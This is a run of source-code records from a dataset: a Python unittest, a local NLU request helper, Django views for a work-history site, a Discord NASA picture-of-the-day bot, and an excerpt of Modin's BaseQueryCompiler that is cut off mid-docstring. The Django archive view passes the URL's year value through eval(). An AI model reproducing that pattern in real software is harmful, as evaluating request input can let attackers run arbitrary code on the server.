os\n\n\nclass TxtMarkerCase(unittest.TestCase):\n def test_maker_case(self):\n f = open(\"srcFile.txt\", \"w\")\n f.write(\"title\\n\\nthis is a content\\n\\nthis a come after content\\n\\n\")\n f.close()\n matchcase1 = \"...\" \\\n \"
\\n\\ntitle\\n\\nthis is a content\\n\\nthis a come after content\\n\\n
\"\n TxtMark.TxtMarker.mark(\"srcFile.txt\", \"destFile.txt\")\n f = open(\"destFile.txt\", \"r\")\n matchcase2 = f.read()\n os.remove(\"srcFile.txt\")\n os.remove(\"destFile.txt\")\n self.assertEqual(matchcase1,matchcase2,\"test\")\n","sub_path":"TxtMark/ut/TxtMarkerTest.py","file_name":"TxtMarkerTest.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429243428","text":"import requests\r\n\r\n\r\n\r\ndef request_nlu(text, project_dir, port):\r\n url = 'http://localhost:' + port + '/parse'\r\n print(url)\r\n data = {\r\n \"q\": text,\r\n \"project\": project_dir,\r\n \"model\": \"nlu\"\r\n }\r\n try:\r\n response = requests.post(url, json=data)\r\n except Exception as e:\r\n print(e)\r\n return None\r\n \r\n return response.json()\r\n\r\n\r\nif __name__ == '__main__':\r\n print(request_nlu('Li Fu', 'name_server', '5061'))","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613495349","text":"# Create your views here.\nfrom django.template import RequestContext\nfrom history.models import Item, Skill\nfrom django.shortcuts import get_object_or_404\nfrom lib.overrides import render_response\nfrom django.core.paginator import Paginator, InvalidPage, EmptyPage\nimport time\nfrom calendar import month_name\nimport datetime\nfrom django.db.models import Q\n\ndef get_date_list():\n\t\"\"\"Get a list of years and months for the posts\"\"\"\n\n\tif not Item.objects.count(): return []\n\n\tyear, month = time.localtime()[:2]\n\tfirst = Item.objects.order_by(\"start_date\")[0]\n\tfyear = first.start_date.year\n\tdates = []\n\n\t# Loop over the years and months\n\tfor y in xrange(year, fyear - 1, -1):\n\t\tdates.append(y)\n\n\treturn dates\n\ndef paginate_items(request, items):\n paginator = Paginator(items,10)\n\n try: page = int(request.GET.get(\"page\",'1'))\n except ValueError: page = 1\n\n try: items = paginator.page(page)\n except (InvalidPage,EmptyPage):\n items = paginator.page(paginator.num_pages)\n\n return items\n\ndef history(request):\n\titems = Item.objects.filter(published=True).order_by(\"-end_date\")\n\titems = paginate_items(request, items)\n\tdates = get_date_list()\n\treturn render_response(request, 'history/index.html', {\n\t\t'skills': Skill.objects.all(),\n\t\t'items': items,\n\t\t'archive_list': dates\n\t\t})\n\ndef view_item(request, slug):\n\tdates = get_date_list()\n\treturn render_response(request, 'history/view_item.html', {\n\t\t'skills': Skill.objects.all(),\n\t\t'item': get_object_or_404(Item, slug=slug),\n\t\t'archive_list': dates\n\t\t})\n\ndef view_skill(request, slug):\n\tskill = get_object_or_404(Skill, slug=slug)\n\titems = Item.objects.filter(published=True, skills=skill).order_by(\"-end_date\")\n\titems = paginate_items(request, items)\n\tdates = get_date_list()\n\n\treturn render_response(request, 'history/skill.html', {\n\t\t'skills': Skill.objects.all(),\n\t\t'items': items,\n\t\t'skill': skill,\n\t\t'archive_list': dates\n\t\t})\n\ndef archive(request, year):\n\titems = \\\n\t Item.objects.filter(published = True,\n\t\t\t\t\t\t start_date__lte = datetime.date(eval(year),12,31),\n\t\t\t\t\t\t end_date__gte = \\\n\t\t\t\t\t\t datetime.date(eval(year),1,1)).order_by(\"-end_date\")\n\titems = paginate_items(request, items)\n\tdates = get_date_list()\n\n\treturn render_response(request, 'history/archive.html', {\n\t\t'skills': 
Skill.objects.all(),\n\t\t'items': items,\n\t\t'year': year,\n\t\t'archive_list': dates\n\t\t})\n","sub_path":"history/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219001182","text":"import discord\nfrom discord.ext import commands\nimport json\nimport asyncio\nimport aiohttp\nimport async_timeout\nimport time\n\nsettings_json = open('settings.json', 'r')\nsettings_json = settings_json.read().strip()\nsettings_json = json.loads(settings_json)\n\nnasa_key = settings_json['nasa_api_key']\n\n\nasync def fetchGet(urlIn):\n async with aiohttp.ClientSession() as session:\n with async_timeout.timeout(10):\n async with session.get(urlIn) as response:\n return await response.text()\n\ngotToday = \"\"\n\n\nclass Apod():\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def apod(self, ctx):\n channel = ctx.message.channel\n global gotToday\n global apod_em\n today = time.strftime(\"%Y-%m-%d\")\n if today != gotToday:\n apod_json = await fetchGet('https://api.nasa.gov/planetary/apod?date={0}&api_key={1}'.format(today, nasa_key))\n apod_json=json.loads(apod_json)\n apod_pic_url=apod_json['hdurl']\n gotToday=today\n apod_em=discord.Embed(\n title = 'Nasa - Astronomy Picture Of The Day', colour = 0xD3D92)\n apod_em.set_image(url = '{0}'.format(apod_pic_url))\n await channel.send(embed = apod_em)\n else:\n await channel.send(embed = apod_em)\n\ndef setup(bot):\n bot.add_cog(Apod(bot))\n","sub_path":"nasabot-apod.py","file_name":"nasabot-apod.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"76040955","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. 
See the License for the specific language\n# governing permissions and limitations under the License.\n\n\"\"\"\nModule contains class ``BaseQueryCompiler``.\n\n``BaseQueryCompiler`` is a parent abstract class for any other query compiler class.\n\"\"\"\n\nimport abc\n\nfrom modin.data_management.functions.default_methods import (\n DataFrameDefault,\n SeriesDefault,\n DateTimeDefault,\n StrDefault,\n BinaryDefault,\n ResampleDefault,\n RollingDefault,\n CatDefault,\n GroupByDefault,\n)\nfrom modin.error_message import ErrorMessage\nimport modin.backends.base.doc_utils as doc_utils\n\nfrom pandas.core.dtypes.common import is_scalar\nimport pandas.core.resample\nimport pandas\nimport numpy as np\nfrom typing import List, Hashable\n\n\ndef _get_axis(axis):\n \"\"\"\n Build index labels getter of the specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to get labels from.\n\n Returns\n -------\n callable(BaseQueryCompiler) -> pandas.Index\n \"\"\"\n\n def axis_getter(self):\n ErrorMessage.default_to_pandas(f\"DataFrame.get_axis({axis})\")\n return self.to_pandas().axes[axis]\n\n return axis_getter\n\n\ndef _set_axis(axis):\n \"\"\"\n Build index labels setter of the specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to set labels on.\n\n Returns\n -------\n callable(BaseQueryCompiler)\n \"\"\"\n\n def axis_setter(self, labels):\n new_qc = DataFrameDefault.register(pandas.DataFrame.set_axis)(\n self, axis=axis, labels=labels\n )\n self.__dict__.update(new_qc.__dict__)\n\n return axis_setter\n\n\n# FIXME: many of the BaseQueryCompiler methods are hiding actual arguments\n# by using *args and **kwargs. They should be spread into actual parameters.\n# Currently actual arguments are placed in the methods docstrings, but since they're\n# not presented in the function's signature it makes linter to raise `PR02: unknown parameters`\n# warning. 
For now, they're silenced by using `noqa` (Modin issue #3108).\nclass BaseQueryCompiler(abc.ABC):\n \"\"\"\n Abstract class that handles the queries to Modin dataframes.\n\n This class defines common query compilers API, most of the methods\n are already implemented and defaulting to pandas.\n\n Attributes\n ----------\n lazy_execution : bool\n Whether underlying execution engine is designed to be executed in a lazy mode only.\n If True, such QueryCompiler will be handled differently at the front-end in order\n to reduce execution triggering as much as possible.\n\n Notes\n -----\n See the Abstract Methods and Fields section immediately below this\n for a list of requirements for subclassing this object.\n \"\"\"\n\n @abc.abstractmethod\n def default_to_pandas(self, pandas_op, *args, **kwargs):\n \"\"\"\n Do fallback to pandas for the passed function.\n\n Parameters\n ----------\n pandas_op : callable(pandas.DataFrame) -> object\n Function to apply to the casted to pandas frame.\n *args : iterable\n Positional arguments to pass to `pandas_op`.\n **kwargs : dict\n Key-value arguments to pass to `pandas_op`.\n\n Returns\n -------\n BaseQueryCompiler\n The result of the `pandas_op`, converted back to ``BaseQueryCompiler``.\n \"\"\"\n pass\n\n # Abstract Methods and Fields: Must implement in children classes\n # In some cases, there you may be able to use the same implementation for\n # some of these abstract methods, but for the sake of generality they are\n # treated differently.\n\n lazy_execution = False\n\n # Metadata modification abstract methods\n def add_prefix(self, prefix, axis=1):\n \"\"\"\n Add string prefix to the index labels along specified axis.\n\n Parameters\n ----------\n prefix : str\n The string to add before each label.\n axis : {0, 1}, default: 1\n Axis to add prefix along. 0 is for index and 1 is for columns.\n\n Returns\n -------\n BaseQueryCompiler\n New query compiler with updated labels.\n \"\"\"\n if axis:\n return DataFrameDefault.register(pandas.DataFrame.add_prefix)(\n self, prefix=prefix\n )\n else:\n return SeriesDefault.register(pandas.Series.add_prefix)(self, prefix=prefix)\n\n def add_suffix(self, suffix, axis=1):\n \"\"\"\n Add string suffix to the index labels along specified axis.\n\n Parameters\n ----------\n suffix : str\n The string to add after each label.\n axis : {0, 1}, default: 1\n Axis to add suffix along. 0 is for index and 1 is for columns.\n\n Returns\n -------\n BaseQueryCompiler\n New query compiler with updated labels.\n \"\"\"\n if axis:\n return DataFrameDefault.register(pandas.DataFrame.add_suffix)(\n self, suffix=suffix\n )\n else:\n return SeriesDefault.register(pandas.Series.add_suffix)(self, suffix=suffix)\n\n # END Metadata modification abstract methods\n\n # Abstract copy\n\n def copy(self):\n \"\"\"\n Make a copy of this object.\n\n Returns\n -------\n BaseQueryCompiler\n Copy of self.\n\n Notes\n -----\n For copy, we don't want a situation where we modify the metadata of the\n copies if we end up modifying something here. We copy all of the metadata\n to prevent that.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.copy)(self)\n\n # END Abstract copy\n\n # Abstract join and append helper functions\n\n def concat(self, axis, other, **kwargs): # noqa: PR02\n \"\"\"\n Concatenate `self` with passed query compilers along specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to concatenate along. 
0 is for index and 1 is for columns.\n other : BaseQueryCompiler or list of such\n Objects to concatenate with `self`.\n join : {'outer', 'inner', 'right', 'left'}, default: 'outer'\n Type of join that will be used if indices on the other axis are different.\n (note: if specified, has to be passed as ``join=value``).\n ignore_index : bool, default: False\n If True, do not use the index values along the concatenation axis.\n The resulting axis will be labeled 0, …, n - 1.\n (note: if specified, has to be passed as ``ignore_index=value``).\n sort : bool, default: False\n Whether or not to sort non-concatenation axis.\n (note: if specified, has to be passed as ``sort=value``).\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Concatenated objects.\n \"\"\"\n concat_join = [\"inner\", \"outer\"]\n\n def concat(df, axis, other, **kwargs):\n kwargs.pop(\"join_axes\", None)\n ignore_index = kwargs.get(\"ignore_index\", False)\n if kwargs.get(\"join\", \"outer\") in concat_join:\n if not isinstance(other, list):\n other = [other]\n other = [df] + other\n result = pandas.concat(other, axis=axis, **kwargs)\n else:\n if isinstance(other, (list, np.ndarray)) and len(other) == 1:\n other = other[0]\n ignore_index = kwargs.pop(\"ignore_index\", None)\n kwargs[\"how\"] = kwargs.pop(\"join\", None)\n result = df.join(other, rsuffix=\"r_\", **kwargs)\n if ignore_index:\n if axis == 0:\n result = result.reset_index(drop=True)\n else:\n result.columns = pandas.RangeIndex(len(result.columns))\n return result\n\n return DataFrameDefault.register(concat)(self, axis=axis, other=other, **kwargs)\n\n # END Abstract join and append helper functions\n\n # Data Management Methods\n @abc.abstractmethod\n def free(self):\n \"\"\"Trigger a cleanup of this object.\"\"\"\n pass\n\n @abc.abstractmethod\n def finalize(self):\n \"\"\"Finalize constructing the dataframe calling all deferred functions which were used to build it.\"\"\"\n pass\n\n # END Data Management Methods\n\n # To/From Pandas\n @abc.abstractmethod\n def to_pandas(self):\n \"\"\"\n Convert underlying query compilers data to ``pandas.DataFrame``.\n\n Returns\n -------\n pandas.DataFrame\n The QueryCompiler converted to pandas.\n \"\"\"\n pass\n\n @classmethod\n @abc.abstractmethod\n def from_pandas(cls, df, data_cls):\n \"\"\"\n Build QueryCompiler from pandas DataFrame.\n\n Parameters\n ----------\n df : pandas.DataFrame\n The pandas DataFrame to convert from.\n data_cls : type\n :py:class:`~modin.engines.base.frame.data.BasePandasFrame` class\n (or its descendant) to convert to.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing data from the pandas DataFrame.\n \"\"\"\n pass\n\n # END To/From Pandas\n\n # From Arrow\n @classmethod\n @abc.abstractmethod\n def from_arrow(cls, at, data_cls):\n \"\"\"\n Build QueryCompiler from Arrow Table.\n\n Parameters\n ----------\n at : Arrow Table\n The Arrow Table to convert from.\n data_cls : type\n :py:class:`~modin.engines.base.frame.data.BasePandasFrame` class\n (or its descendant) to convert to.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing data from the pandas DataFrame.\n \"\"\"\n pass\n\n # END From Arrow\n\n # To NumPy\n\n def to_numpy(self, **kwargs): # noqa: PR02\n \"\"\"\n Convert underlying query compilers data to NumPy array.\n\n Parameters\n ----------\n dtype : dtype\n The dtype of the resulted array.\n copy : bool\n Whether to ensure that the returned value is not a view on another 
array.\n na_value : object\n The value to replace missing values with.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n np.ndarray\n The QueryCompiler converted to NumPy array.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.to_numpy)(self, **kwargs)\n\n # END To NumPy\n\n # Abstract inter-data operations (e.g. add, sub)\n # These operations require two DataFrames and will change the shape of the\n # data if the index objects don't match. An outer join + op is performed,\n # such that columns/rows that don't have an index on the other DataFrame\n # result in NaN values.\n\n @doc_utils.doc_binary_method(operation=\"addition\", sign=\"+\")\n def add(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.add)(self, other=other, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.combine\")\n def combine(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Perform column-wise combine with another QueryCompiler with passed `func`.\n\n If axes are not equal, perform frames alignment first.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Left operand of the binary operation.\n func : callable(pandas.Series, pandas.Series) -> pandas.Series\n Function that takes two ``pandas.Series`` with aligned axes\n and returns one ``pandas.Series`` as resulting combination.\n fill_value : float or None\n Value to fill missing values with after frame alignment occurred.\n overwrite : bool\n If True, columns in `self` that do not exist in `other`\n will be overwritten with NaNs.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Result of combine.\n \"\"\"\n return BinaryDefault.register(pandas.DataFrame.combine)(\n self, other=other, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.combine_first\")\n def combine_first(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Fill null elements of `self` with value in the same location in `other`.\n\n If axes are not equal, perform frames alignment first.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Provided frame to use to fill null values from.\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return BinaryDefault.register(pandas.DataFrame.combine_first)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"equality comparison\", sign=\"==\")\n def eq(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.eq)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"integer division\", sign=\"//\")\n def floordiv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.floordiv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"greater than or equal comparison\", sign=\">=\", op_type=\"comparison\"\n )\n def ge(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.ge)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"greater than comparison\", sign=\">\", op_type=\"comparison\"\n )\n def gt(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.gt)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"less than or equal comparison\", sign=\"<=\", op_type=\"comparison\"\n )\n def le(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.le)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"less than comparison\", sign=\"<\", op_type=\"comparison\"\n )\n def lt(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.lt)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"modulo\", sign=\"%\")\n def mod(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.mod)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"multiplication\", sign=\"*\")\n def mul(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.mul)(self, other=other, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.corr\")\n def corr(self, **kwargs): # noqa: PR02\n \"\"\"\n Compute pairwise correlation of columns, excluding NA/null values.\n\n Parameters\n ----------\n method : {'pearson', 'kendall', 'spearman'} or callable(pandas.Series, pandas.Series) -> pandas.Series\n Correlation method.\n min_periods : int\n Minimum number of observations required per pair of columns\n to have a valid result. If fewer than `min_periods` non-NA values\n are present the result will be NA.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Correlation matrix.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.corr)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.cov\")\n def cov(self, **kwargs): # noqa: PR02\n \"\"\"\n Compute pairwise covariance of columns, excluding NA/null values.\n\n Parameters\n ----------\n min_periods : int\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Covariance matrix.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.cov)(self, **kwargs)\n\n def dot(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Compute the matrix multiplication of `self` and `other`.\n\n Parameters\n ----------\n other : BaseQueryCompiler or NumPy array\n The other query compiler or NumPy array to matrix multiply with `self`.\n squeeze_self : boolean\n If `self` is a one-column query compiler, indicates whether it represents Series object.\n squeeze_other : boolean\n If `other` is a one-column query compiler, indicates whether it represents Series object.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n A new query compiler that contains result of the matrix multiply.\n \"\"\"\n if kwargs.get(\"squeeze_self\", False):\n applyier = pandas.Series.dot\n else:\n applyier = pandas.DataFrame.dot\n return BinaryDefault.register(applyier)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"not equal comparison\", sign=\"!=\", op_type=\"comparison\"\n )\n def ne(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.ne)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"exponential power\", sign=\"**\")\n def pow(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.pow)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"integer division\", sign=\"//\", self_on_right=True\n )\n def rfloordiv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rfloordiv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"modulo\", sign=\"%\", self_on_right=True)\n def rmod(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rmod)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"exponential power\", sign=\"**\", self_on_right=True\n )\n def rpow(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rpow)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"substraction\", sign=\"-\", self_on_right=True)\n def rsub(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rsub)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"division\", sign=\"/\", self_on_right=True)\n def rtruediv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rtruediv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"substraction\", sign=\"-\")\n def sub(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.sub)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"division\", sign=\"/\")\n def truediv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.truediv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"conjunction\", sign=\"&\", op_type=\"logical\")\n def __and__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__and__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"disjunction\", sign=\"|\", op_type=\"logical\")\n def __or__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__or__)(\n self, 
other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"conjunction\", sign=\"&\", op_type=\"logical\", self_on_right=True\n )\n def __rand__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__rand__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"disjunction\", sign=\"|\", op_type=\"logical\", self_on_right=True\n )\n def __ror__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__ror__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"exclusive or\", sign=\"^\", op_type=\"logical\", self_on_right=True\n )\n def __rxor__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__rxor__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"exclusive or\", sign=\"^\", op_type=\"logical\")\n def __xor__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__xor__)(\n self, other=other, **kwargs\n )\n\n # FIXME: query compiler shoudln't care about differences between Frame and Series.\n # We should combine `df_update` and `series_update` into one method (Modin issue #3101).\n @doc_utils.add_refer_to(\"DataFrame.update\")\n def df_update(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Update values of `self` using non-NA values of `other` at the corresponding positions.\n\n If axes are not equal, perform frames alignment first.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Frame to grab replacement values from.\n join : {\"left\"}\n Specify type of join to align frames if axes are not equal\n (note: currently only one type of join is implemented).\n overwrite : bool\n Whether to overwrite every corresponding value of self, or only if it's NAN.\n filter_func : callable(pandas.Series, pandas.Series) -> numpy.ndarray\n Function that takes column of the self and return bool mask for values, that\n should be overwriten in the self frame.\n errors : {\"raise\", \"ignore\"}\n If \"raise\", will raise a ``ValueError`` if `self` and `other` both contain\n non-NA data in the same place.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated values.\n \"\"\"\n return BinaryDefault.register(pandas.DataFrame.update, inplace=True)(\n self, other=other, **kwargs\n )\n\n @doc_utils.add_refer_to(\"Series.update\")\n def series_update(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Update values of `self` using values of `other` at the corresponding indices.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n One-column query compiler with updated values.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated values.\n \"\"\"\n return BinaryDefault.register(pandas.Series.update, inplace=True)(\n self,\n other=other,\n squeeze_self=True,\n squeeze_other=True,\n **kwargs,\n )\n\n @doc_utils.add_refer_to(\"DataFrame.clip\")\n def clip(self, lower, upper, **kwargs): # noqa: PR02\n \"\"\"\n Trim values at input threshold.\n\n Parameters\n ----------\n lower : float or list-like\n upper : float or list-like\n axis : {0, 1}\n inplace : {False}\n This parameter serves the compatibility purpose. Always has to be False.\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with values limited by the specified thresholds.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.clip)(\n self, lower=lower, upper=upper, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.where\")\n def where(self, cond, other, **kwargs): # noqa: PR02\n \"\"\"\n Update values of `self` using values from `other` at positions where `cond` is False.\n\n Parameters\n ----------\n cond : BaseQueryCompiler\n Boolean mask. True - keep the self value, False - replace by `other` value.\n other : BaseQueryCompiler or pandas.Series\n Object to grab replacement values from.\n axis : {0, 1}\n Axis to align frames along if axes of self, `cond` and `other` are not equal.\n 0 is for index, when 1 is for columns.\n level : int or label, optional\n Level of MultiIndex to align frames along if axes of self, `cond`\n and `other` are not equal. Currently `level` parameter is not implemented,\n so only None value is acceptable.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with updated data.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.where)(\n self, cond=cond, other=other, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.merge\")\n def merge(self, right, **kwargs): # noqa: PR02\n \"\"\"\n Merge QueryCompiler objects using a database-style join.\n\n Parameters\n ----------\n right : BaseQueryCompiler\n QueryCompiler of the right frame to merge with.\n how : {\"left\", \"right\", \"outer\", \"inner\", \"cross\"}\n on : label or list of such\n left_on : label or list of such\n right_on : label or list of such\n left_index : bool\n right_index : bool\n sort : bool\n suffixes : list-like\n copy : bool\n indicator : bool or str\n validate : str\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler that contains result of the merge.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.merge)(\n self, right=right, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.join\")\n def join(self, right, **kwargs): # noqa: PR02\n \"\"\"\n Join columns of another QueryCompiler.\n\n Parameters\n ----------\n right : BaseQueryCompiler\n QueryCompiler of the right frame to join with.\n on : label or list of such\n how : {\"left\", \"right\", \"outer\", \"inner\"}\n lsuffix : str\n rsuffix : str\n sort : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler that contains result of the join.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.join)(self, right, **kwargs)\n\n # END Abstract inter-data operations\n\n # Abstract Transpose\n def transpose(self, *args, **kwargs): # noqa: PR02\n \"\"\"\n Transpose this QueryCompiler.\n\n Parameters\n ----------\n copy : bool\n Whether to copy the data after transposing.\n *args : iterable\n Serves the compatibility purpose. Does not affect the result.\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Transposed new QueryCompiler.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.transpose)(\n self, *args, **kwargs\n )\n\n def columnarize(self):\n \"\"\"\n Transpose this QueryCompiler if it has a single row but multiple columns.\n\n This method should be called for QueryCompilers representing a Series object,\n i.e. ``self.is_series_like()`` should be True.\n\n Returns\n -------\n BaseQueryCompiler\n Transposed new QueryCompiler or self.\n \"\"\"\n if len(self.columns) != 1 or (\n len(self.index) == 1 and self.index[0] == \"__reduced__\"\n ):\n return self.transpose()\n return self\n\n def is_series_like(self):\n \"\"\"\n Check whether this QueryCompiler can represent ``modin.pandas.Series`` object.\n\n Returns\n -------\n bool\n Return True if QueryCompiler has a single column or row, False otherwise.\n \"\"\"\n return len(self.columns) == 1 or len(self.index) == 1\n\n # END Abstract Transpose\n\n # Abstract reindex/reset_index (may shuffle data)\n @doc_utils.add_refer_to(\"DataFrame.reindex\")\n def reindex(self, axis, labels, **kwargs): # noqa: PR02\n \"\"\"\n Align QueryCompiler data with a new index along specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to align labels along. 0 is for index, 1 is for columns.\n labels : list-like\n Index-labels to align with.\n method : {None, \"backfill\"/\"bfill\", \"pad\"/\"ffill\", \"nearest\"}\n Method to use for filling holes in reindexed frame.\n fill_value : scalar\n Value to use for missing values in the resulted frame.\n limit : int\n tolerance : int\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with aligned axis.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.reindex)(\n self, axis=axis, labels=labels, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.reset_index\")\n def reset_index(self, **kwargs): # noqa: PR02\n \"\"\"\n Reset the index, or a level of it.\n\n Parameters\n ----------\n drop : bool\n Whether to drop the reset index or insert it at the beginning of the frame.\n level : int or label, optional\n Level to remove from index. Removes all levels by default.\n col_level : int or label\n If the columns have multiple levels, determines which level the labels\n are inserted into.\n col_fill : label\n If the columns have multiple levels, determines how the other levels\n are named.\n **kwargs : dict\n Serves the 